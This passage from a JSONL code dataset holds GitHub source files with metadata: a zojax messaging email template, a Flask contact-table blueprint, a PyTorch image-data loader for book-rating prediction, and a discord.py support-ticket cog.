{"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 55, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, 
"usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 57, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 59, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.ObtainAuthToken.as_view", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.ObtainAuthToken", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "31674753891", "text": "from email.Utils import formataddr\n\nfrom zope import interface, component\nfrom zope.component import queryUtility, getMultiAdapter\n\nfrom zope.traversing.browser import absoluteURL\nfrom zope.app.component.hooks import getSite\nfrom zope.security.management import queryInteraction\nfrom zope.lifecycleevent.interfaces import IObjectCreatedEvent\n\nfrom zojax.mail.interfaces import IMailAddress\nfrom zojax.mailtemplate.interfaces import IMailTemplate\n\nfrom zojax.formatter.utils import getFormatter\n\nfrom zojax.messaging.interfaces import IMessage\nfrom zojax.messaging.interfaces import IMessageService\nfrom zojax.messaging.interfaces import IMessageCreatedEvent\nfrom zojax.messaging.interfaces import IPortalMessagingPreference\n\n\nclass MessageTemplate(object):\n\n contentType = 'text/html'\n\n def update(self):\n super(MessageTemplate, self).update()\n\n context = self.context\n request = self.request\n\n formatter = getFormatter(request, 'fancyDatetime', 'medium')\n\n self.date = formatter.format(context.__date__)\n self.service = context.__parent__\n\n storage = self.service.__parent__\n self.url = '%s/%s/'%(absoluteURL(storage, request), context.__name__)\n\n @property\n def subject(self):\n msg = u'You have been received new message.'\n\n title = getattr(getSite(), 'title', u'')\n if title:\n return u'%s: %s'%(title, msg)\n else:\n return msg\n\n @property\n def messageId(self):\n return '<%s@zojax>'%self.context.__uid__\n\n\n@component.adapter(IMessage, IMessageCreatedEvent)\ndef messageCreated(message, event):\n principal = event.storage.principal\n\n prefs = IPortalMessagingPreference(principal)\n if not prefs.notify:\n return\n\n email = IMailAddress(principal, None)\n if email:\n request = queryInteraction().participations[0]\n template = getMultiAdapter(\n (message, request), IMailTemplate, 'template-created')\n template.addHeader(u'To', formataddr((principal.title, email.address)))\n template.send((email.address,))\n", "repo_name": "Zojax/zojax.messaging", "sub_path": "src/zojax/messaging/browser/template.py", "file_name": "template.py", "file_ext": "py", "file_size_in_byte": 2091, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "zojax.formatter.utils.getFormatter", "line_number": 32, "usage_type": "call"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 38, "usage_type": "call"}, {"api_name": "zope.app.component.hooks.getSite", "line_number": 44, "usage_type": "call"}, {"api_name": "zojax.messaging.interfaces.IPortalMessagingPreference", "line_number": 59, "usage_type": "call"}, {"api_name": "email.Utils", "line_number": 63, "usage_type": "name"}, {"api_name": "zojax.mail.interfaces.IMailAddress", "line_number": 63, "usage_type": "call"}, {"api_name": "email.Utils", "line_number": 64, "usage_type": "name"}, {"api_name": 
"zope.security.management.queryInteraction", "line_number": 65, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 66, "usage_type": "call"}, {"api_name": "zojax.mailtemplate.interfaces.IMailTemplate", "line_number": 67, "usage_type": "argument"}, {"api_name": "email.Utils.formataddr", "line_number": 68, "usage_type": "call"}, {"api_name": "email.Utils.address", "line_number": 68, "usage_type": "attribute"}, {"api_name": "email.Utils", "line_number": 68, "usage_type": "name"}, {"api_name": "email.Utils.address", "line_number": 69, "usage_type": "attribute"}, {"api_name": "email.Utils", "line_number": 69, "usage_type": "name"}, {"api_name": "zope.component.adapter", "line_number": 55, "usage_type": "call"}, {"api_name": "zojax.messaging.interfaces.IMessage", "line_number": 55, "usage_type": "argument"}, {"api_name": "zojax.messaging.interfaces.IMessageCreatedEvent", "line_number": 55, "usage_type": "argument"}, {"api_name": "zope.component", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "74662668323", "text": "from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required, current_user # Added current_user here\nfrom models import db, ContactTable, LogsTable\nfrom datetime import datetime\n\nfrom datetime import datetime\n\ncontact_bp = Blueprint('contact_table', __name__, template_folder='../templates/group0')\n\n@contact_bp.route('/contact_table')\n@login_required\ndef contact_table():\n current_table, tables = get_menu_context('Cadastre Table')\n return render_template('group1/contact_table.html', tables=tables, current_table=current_table)\n\n@contact_bp.route('/get_contact_data')\n@login_required\ndef get_contact_data():\n contacts = ContactTable.query.all()\n data = [{'CONTACT_ID': c.CONTACT_ID, 'CONTACT_NAME': c.CONTACT_NAME, 'CONTACT_EMAIL': c.CONTACT_EMAIL, 'CONTACT_PHONE': c.CONTACT_PHONE} for c in contacts]\n return jsonify(data)\n\n@contact_bp.route('/update_contact_table', methods=['POST'])\n@login_required\ndef update_contact_table():\n # extract data from form\n table_id = request.form.get('table_id') # the ID of the row to be updated\n column_name = request.form.get('column_name') # the name of the column to be updated\n new_value = request.form.get('new_value') # the new value for the column\n user = current_user.username # get current user's username\n\n # Get the old value before updating\n old_value = db.session.query(ContactTable).filter(ContactTable.CONTACT_ID == table_id).first().__getattribute__(column_name)\n\n # Perform the update operation\n db.session.query(ContactTable).filter(ContactTable.CONTACT_ID == table_id).update({column_name: new_value})\n\n # Log the update operation\n log = LogsTable(table_name='Contact Table', variable_name=column_name, table_id=table_id, old_value=old_value, new_value=new_value, user=user, date_update=datetime.now(), update_type=\"Update\")\n db.session.add(log)\n\n # Commit the changes\n db.session.commit()\n\n return jsonify(success=True)\n", "repo_name": "LucaSiila/CRUD---WEBAPP", "sub_path": "blueprints/contact_table.py", "file_name": "contact_table.py", "file_ext": "py", "file_size_in_byte": 1983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 11, "usage_type": "name"}, 
{"api_name": "models.ContactTable.query.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.ContactTable.query", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.ContactTable", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask_login.current_user.username", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 30, "usage_type": "name"}, {"api_name": "models.db.session.query", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ContactTable", "line_number": 33, "usage_type": "argument"}, {"api_name": "models.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 33, "usage_type": "name"}, {"api_name": "models.ContactTable.CONTACT_ID", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.db.session.query", "line_number": 36, "usage_type": "call"}, {"api_name": "models.ContactTable", "line_number": 36, "usage_type": "argument"}, {"api_name": "models.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 36, "usage_type": "name"}, {"api_name": "models.ContactTable.CONTACT_ID", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.LogsTable", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "models.db.session.add", "line_number": 40, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 40, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 43, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "73413948324", "text": "import numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport torchvision.transforms as transforms\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nfrom .context_data import process_context_data\nfrom .Preprocess import preprocess\nimport os\n\n\nclass Image_Dataset(Dataset):\n def __init__(self, user_isbn_vector, img_vector, label):\n \"\"\"\n Parameters\n ----------\n user_isbn_vector : np.ndarray\n 벡터화된 유저와 책 
 data.\n        img_vector : np.ndarray\n            Vectorized image data.\n        label : np.ndarray\n            Target (label) data.\n        ----------\n        \"\"\"\n        self.user_isbn_vector = user_isbn_vector\n        self.img_vector = img_vector\n        self.label = label\n    def __len__(self):\n        return self.user_isbn_vector.shape[0]\n    def __getitem__(self, i):\n        return {\n            'user_isbn_vector' : torch.tensor(self.user_isbn_vector[i], dtype=torch.long),\n            'img_vector' : torch.tensor(self.img_vector[i], dtype=torch.float32),\n            'label' : torch.tensor(self.label[i], dtype=torch.float32),\n            }\n\n\ndef image_vector(path):\n    \"\"\"\n    Parameters\n    ----------\n    path : str\n        Path to the image file.\n    ----------\n    \"\"\"\n    img = Image.open(path)\n    scale = transforms.Resize((32, 32))\n    tensor = transforms.ToTensor()\n    img_fe = Variable(tensor(scale(img)))\n    return img_fe\n\n\ndef process_img_data(df, books, user2idx, isbn2idx, train=False):\n    \"\"\"\n    Parameters\n    ----------\n    df : pd.DataFrame\n        Base data frame to process.\n    books : pd.DataFrame\n        Data frame with book information.\n    user2idx : Dict\n        Dictionary mapping each user id to an index.\n    isbn2idx : Dict\n        Dictionary mapping each ISBN to an index.\n    ----------\n    \"\"\"\n    books_ = books.copy()\n    books_['isbn'] = books_['isbn'].map(isbn2idx)\n\n    if train == True:\n        df_ = df.copy()\n    else:\n        df_ = df.copy()\n    df_['user_id'] = df_['user_id'].map(user2idx)\n    df_['isbn'] = df_['isbn'].map(isbn2idx)\n\n    df_ = pd.merge(df_, books_[['isbn', 'img_path']], on='isbn', how='left')\n    # df_['img_path'] = df_['img_path'].apply(lambda x: 'data/'+x)\n    df_['img_path'] = df_['img_path'].apply(lambda x: '/opt/ml/data/'+x)\n    img_vector_df = df_[['img_path']].drop_duplicates().reset_index(drop=True).copy()\n    data_box = []\n    for idx, path in tqdm(enumerate(sorted(img_vector_df['img_path']))):\n        data = image_vector(path)\n        if data.size()[0] == 3:\n            data_box.append(np.array(data))\n        else:\n            data_box.append(np.array(data.expand(3, data.size()[1], data.size()[2])))\n    img_vector_df['img_vector'] = data_box\n    df_ = pd.merge(df_, img_vector_df, on='img_path', how='left')\n    return df_\n\n\ndef image_data_load(args):\n    \"\"\"\n    Parameters\n    ----------\n    Args : argparse.ArgumentParser\n        data_path : str\n            Path to the data directory.\n        test_size : float\n            Train/valid split ratio.\n        seed : int\n            Random seed value.\n        batch_size : int\n            Batch size.\n    ----------\n    \"\"\"\n    users = pd.read_csv(args.users_data)\n    books = pd.read_csv(args.books_data)\n    train = pd.read_csv(args.data_path + 'train_ratings.csv')\n    test = pd.read_csv(args.data_path + 'test_ratings.csv')\n    sub = pd.read_csv(args.data_path + 'sample_submission.csv')\n\n    ids = pd.concat([train['user_id'], sub['user_id']]).unique()\n    isbns = pd.concat([train['isbn'], sub['isbn']]).unique()\n\n    idx2user = {idx:id for idx, id in enumerate(ids)}\n    idx2isbn = {idx:isbn for idx, isbn in enumerate(isbns)}\n\n    user2idx = {id:idx for idx, id in idx2user.items()}\n    isbn2idx = {isbn:idx for idx, isbn in idx2isbn.items()}\n\n    train['user_id'] = train['user_id'].map(user2idx)\n    sub['user_id'] = sub['user_id'].map(user2idx)\n\n    train['isbn'] = train['isbn'].map(isbn2idx)\n    sub['isbn'] = sub['isbn'].map(isbn2idx)\n\n    is_dl = args.model in ('NCF', 'WDN', 'DCN', 'CNN_FM', 'DeepCoNN')\n\n    if args.eda == 'default':\n        users, books = process_context_data(users, books, train, test, is_dl)\n    elif args.eda == 'mission1':\n        users, books = mission_1_EDA(users, books, train, test, is_dl)\n    elif args.eda == 'jisu':\n        users, books = jisu_EDA_1(users, books, train, test, is_dl)\n    elif args.eda == 'age_0413_ver1':\n        users, books = age_0413_ver1(users,
 books, train, test, is_dl)\n    elif args.eda == 'age_0413_ver2':\n        users, books = age_0413_ver2(users, books, train, test, is_dl)\n    elif args.eda == 'age_0413_ver4':\n        users, books = age_0413_ver4(users, books, train, test, is_dl)\n    elif args.eda == 'category_0414_ver1':\n        users, books = category_0414_ver1(users, books, train, test, is_dl)\n    elif args.eda == 'dohyun_0415_ver1':\n        users, books = dohyun_0415_ver1(users, books, train, test, is_dl)\n    elif args.eda == 'dohyun_0415_ver4':\n        users, books = dohyun_0415_ver4(users, books, train, test, is_dl)    \n\n    img_train = process_img_data(train, books, user2idx, isbn2idx, train=True)\n    img_test = process_img_data(test, books, user2idx, isbn2idx, train=False)\n\n    data = {\n            'train':train,\n            'test':test,\n            'users':users,\n            'books':books,\n            'sub':sub,\n            'idx2user':idx2user,\n            'idx2isbn':idx2isbn,\n            'user2idx':user2idx,\n            'isbn2idx':isbn2idx,\n            'img_train':img_train,\n            'img_test':img_test,\n            }\n    return data\n\n\ndef image_data_split(args, data):\n    \"\"\"\n    Parameters\n    ----------\n    Args : argparse.ArgumentParser\n        test_size : float\n            Train/valid split ratio.\n        seed : int\n            Random seed value.\n        data : Dict\n            Dictionary of data preprocessed by image_data_load.\n    ----------\n    \"\"\"\n    X_train, X_valid, y_train, y_valid = train_test_split(\n        data['img_train'][['user_id', 'isbn', 'img_vector']],\n        data['img_train']['rating'],\n        test_size=args.test_size,\n        random_state=args.seed,\n        shuffle=True\n        )\n    data['X_train'], data['X_valid'], data['y_train'], data['y_valid'] = X_train, X_valid, y_train, y_valid\n    # split indices into train and validation data\n    train_idx, valid_idx = train_test_split(data['train'].index, test_size=args.test_size, random_state=args.seed, shuffle=True)\n\n    return data\n\n\ndef image_data_loader(args, data):\n    \"\"\"\n    Parameters\n    ----------\n    Args : argparse.ArgumentParser\n        batch_size : int\n            Batch size.\n        data : Dict\n            Dictionary with train/valid/test data produced by image_data_split.\n    ----------\n    \"\"\"\n    train_dataset = Image_Dataset(\n        data['X_train'][['user_id', 'isbn']].values,\n        data['X_train']['img_vector'].values,\n        data['y_train'].values\n        )\n    valid_dataset = Image_Dataset(\n        data['X_valid'][['user_id', 'isbn']].values,\n        data['X_valid']['img_vector'].values,\n        data['y_valid'].values\n        )\n    test_dataset = Image_Dataset(\n        data['img_test'][['user_id', 'isbn']].values,\n        data['img_test']['img_vector'].values,\n        data['img_test']['rating'].values\n        )\n\n    train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, num_workers=0, shuffle=True)\n    valid_dataloader = torch.utils.data.DataLoader(valid_dataset, batch_size=args.batch_size, num_workers=0, shuffle=True)\n    test_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, num_workers=0, shuffle=False)\n    data['train_dataloader'], data['valid_dataloader'], data['test_dataloader'] = train_dataloader, valid_dataloader, test_dataloader\n    return data\n", "repo_name": "boostcampaitech5/level1_bookratingprediction-recsys-13", "sub_path": "src/data/image_data.py", "file_name": "image_data.py", "file_ext": "py", "file_size_in_byte": 8945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 37, "usage_type": 
"call"}, {"api_name": "torch.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 51, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 81, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 119, "usage_type": "call"}, {"api_name": "context_data.process_context_data", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 229, "usage_type": "attribute"}]} +{"seq_id": "18313903181", "text": "import discord\r\nfrom discord.ext import commands\r\nimport sqlite3\r\nimport asyncio\r\n\r\nclass support(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command()\r\n\tasync def new(self, ctx, *args):\r\n\t\tconn = sqlite3.connect(\"discord.sqlite\")\r\n\t\tcur = conn.cursor()\r\n\t\tcur.execute(\"SELECT * FROM bot\")\r\n\t\trows = cur.fetchall()\r\n\t\ttemp = rows[0][1]\r\n\t\tif len(str(temp)) == 1:\r\n\t\t\tnumber = f\"000{temp}\"\r\n\t\telif len(str(temp)) == 2:\r\n\t\t\tnumber = f\"00{temp}\"\r\n\t\telif len(str(temp)) == 3:\r\n\t\t\tnumber = f\"0{temp}\"\r\n\t\telse:\r\n\t\t\tnumber = temp\r\n\r\n\t\tcategory = self.bot.get_channel(715125391290925107)\r\n\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\toverwrites = {\r\n\t\t\tctx.guild.me: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\tstaffs: discord.PermissionOverwrite(read_messages=True, send_messages=True, 
manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\tctx.author: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True),\r\n\t\t\tctx.guild.default_role: discord.PermissionOverwrite(read_messages=False)\r\n\t\t}\r\n\t\tchannel = await ctx.guild.create_text_channel(name=f\"지원_{number}\", topic=f\"{str(ctx.author)} ( {ctx.author.id} ) 님의 티켓방이에요.\", overwrites=overwrites, category=category, reason=f\"{str(ctx.author)}님의 티켓 개설 요청\")\r\n\t\t\r\n\t\tif not args:\r\n\t\t\tdesc = \"직접 물어보세요!\"\r\n\t\telse:\r\n\t\t\tdesc = \"\"\r\n\t\t\tfor arg in args:\r\n\t\t\t\tdesc += f\"{arg} \"\r\n\t\t\r\n\t\tembed = discord.Embed(title=f\"{str(ctx.author)}님이 지원 티켓을 만드셨어요.\", description=f\"지원 요청한 주요 내용 : {desc}\\n \\n*잠시만 기다려주세요. 지원 팀이 최대한 빨리 티켓을 확인하고 답장할 거에요!*\", color=0xFFFCC9)\r\n\t\tembed.set_author(name=\"지원\", icon_url=self.bot.user.avatar_url)\r\n\t\tdev = self.bot.get_user(526958314647453706)\r\n\t\tembed.set_footer(text=f\"Powered by {str(dev)}\", icon_url=dev.avatar_url)\r\n\t\tembed.set_thumbnail(url=ctx.guild.icon_url_as(static_format=\"png\", size=2048))\r\n\t\t\r\n\t\tmsg = await channel.send(\"@here\", embed=embed)\r\n\t\tawait msg.pin()\r\n\t\tcur.execute(f\"UPDATE bot SET tickno = {int(temp) + 1}\")\r\n\t\tconn.commit()\r\n\t\tconn.close()\r\n\t\r\n\t@commands.command()\r\n\tasync def close(self, ctx):\r\n\t\tif ctx.channel.category.id != 715125391290925107:\r\n\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 명령어는 지원 티켓 채널에서만 사용하실 수 있어요!\")\r\n\t\telse:\r\n\t\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\t\tif str(ctx.author.id) in ctx.channel.topic or staffs in ctx.author.roles:\r\n\t\t\t\tmsg = await ctx.send(f\"{ctx.author.mention} - 정말로 이 티켓 채널을 비활성화하실 건가요? 비활성화 된 후에는 복구할 수 없어요!\\n<:cs_yes:659355468715786262> - 예\\n<:cs_no:659355468816187405> - 아니오\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_yes:659355468715786262>\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_no:659355468816187405>\")\r\n\t\t\t\tdef check(reaction, user):\r\n\t\t\t\t\treturn reaction.message.id == msg.id and user == ctx.author\r\n\t\t\t\ttry:\r\n\t\t\t\t\treaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)\r\n\t\t\t\texcept asyncio.TimeoutError:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\telse:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\t\tif str(reaction.emoji) == \"<:cs_yes:659355468715786262>\":\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 알겠어요! 5초 후에 채널이 자동으로 비활성화될 거에요.\")\r\n\t\t\t\t\t\tawait asyncio.sleep(5)\r\n\t\t\t\t\t\ta = ctx.channel.topic.split(\"(\")[1]\r\n\t\t\t\t\t\tida = a.split(\")\")[0]\r\n\t\t\t\t\t\tuser = ctx.guild.get_member(int(ida))\r\n\t\t\t\t\t\tif user is not None:\r\n\t\t\t\t\t\t\tawait ctx.channel.set_permissions(user, overwrite=None, reason=\"티켓 채널 닫기\")\r\n\t\t\t\t\t\tdeprecated = self.bot.get_channel(715156102857228288)\r\n\t\t\t\t\t\tawait ctx.channel.edit(category=deprecated)\r\n\t\t\t\t\t\tawait user.send(f\"{ctx.author.mention} - <#{ctx.channel.id}> 채널이 닫혔어요. 티켓을 다시 여시려면 아래 채널 ID를 사용해 `r.open [ ID ]` 명령어를 사용해주세요.\\n채널 ID : {ctx.channel.id}\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 알겠어요! 티켓 채널 비활성화를 취소했어요.\")\r\n\t\t\telse:\r\n\t\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 채널은 당신이 연 티켓 채널이 아니에요!
 당신은 이 티켓 채널을 닫으실 수 없어요.\")\r\n\t\r\n\t@commands.command()\r\n\tasync def open(self, ctx, channel: discord.TextChannel):\r\n\t\tif channel.category.id != 715156102857228288:\r\n\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 명령어는 닫힌 지원 티켓 채널에 대해서만 사용하실 수 있어요!\")\r\n\t\telse:\r\n\t\t\tstaffs = ctx.guild.get_role(711753639722745896)\r\n\t\t\tif str(ctx.author.id) in channel.topic or staffs in ctx.author.roles:\r\n\t\t\t\tmsg = await ctx.send(f\"{ctx.author.mention} - 티켓 채널을 정말로 다시 여시겠어요?\\n<:cs_yes:659355468715786262> - 예\\n<:cs_no:659355468816187405> - 아니오\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_yes:659355468715786262>\")\r\n\t\t\t\tawait msg.add_reaction(\"<:cs_no:659355468816187405>\")\r\n\t\t\t\tdef check(reaction, user):\r\n\t\t\t\t\treturn reaction.message.id == msg.id and user == ctx.author\r\n\t\t\t\ttry:\r\n\t\t\t\t\treaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)\r\n\t\t\t\texcept asyncio.TimeoutError:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\telse:\r\n\t\t\t\t\tawait msg.clear_reactions()\r\n\t\t\t\t\tif str(reaction.emoji) == \"<:cs_yes:659355468715786262>\":\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 티켓 채널을 다시 열었어요.\")\r\n\t\t\t\t\t\ta = channel.topic.split(\"(\")[1]\r\n\t\t\t\t\t\tida = a.split(\")\")[0]\r\n\t\t\t\t\t\tuser = ctx.guild.get_member(int(ida))\r\n\t\t\t\t\t\toverwrites = {\r\n\t\t\t\t\t\t\tctx.guild.me: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\t\t\t\t\tstaffs: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True, read_message_history=True),\r\n\t\t\t\t\t\t\tuser: discord.PermissionOverwrite(read_messages=True, send_messages=True, manage_messages=True, manage_channels=True, manage_roles=True),\r\n\t\t\t\t\t\t\tctx.guild.default_role: discord.PermissionOverwrite(read_messages=False)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tawait channel.edit(overwrites=overwrites, reason=\"티켓 채널 다시 열림\")\r\n\t\t\t\t\t\tactivated = self.bot.get_channel(715125391290925107)\r\n\t\t\t\t\t\tawait channel.edit(category=activated)\r\n\t\t\t\t\t\tawait channel.send(f\"@here - {ctx.author}님이 티켓을 다시 여셨어요.\\n \\n**잠시만 기다려주세요. 곧 지원 팀이 도착할거에요!**\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tawait msg.edit(content=f\"{ctx.author.mention} - 티켓 채널 다시 열기가 취소되었어요.\")\r\n\t\t\telse:\r\n\t\t\t\tawait ctx.send(f\"{ctx.author.mention} - 이 채널은 당신이 연 티켓 채널이 아니에요!
 당신은 이 티켓 채널을 다시 열 수 없어요.\")\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(support(bot))", "repo_name": "fossabot/management-bot", "sub_path": "modules/support.py", "file_name": "support.py", "file_ext": "py", "file_size_in_byte": 7050, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 6, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 29, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 43, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 10, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 10, "usage_type": "name"}, {"api_name": "asyncio.TimeoutError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 55, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 55, "usage_type": "name"}, {"api_name": "discord.TextChannel", "line_number": 90, "usage_type": "attribute"}, {"api_name": "asyncio.TimeoutError", "line_number": 103, "usage_type": "attribute"}, {"api_name": "discord.PermissionOverwrite", "line_number": 113, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 114, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 115, "usage_type": "call"}, {"api_name": "discord.PermissionOverwrite", "line_number": 116, "usage_type": "call"}, 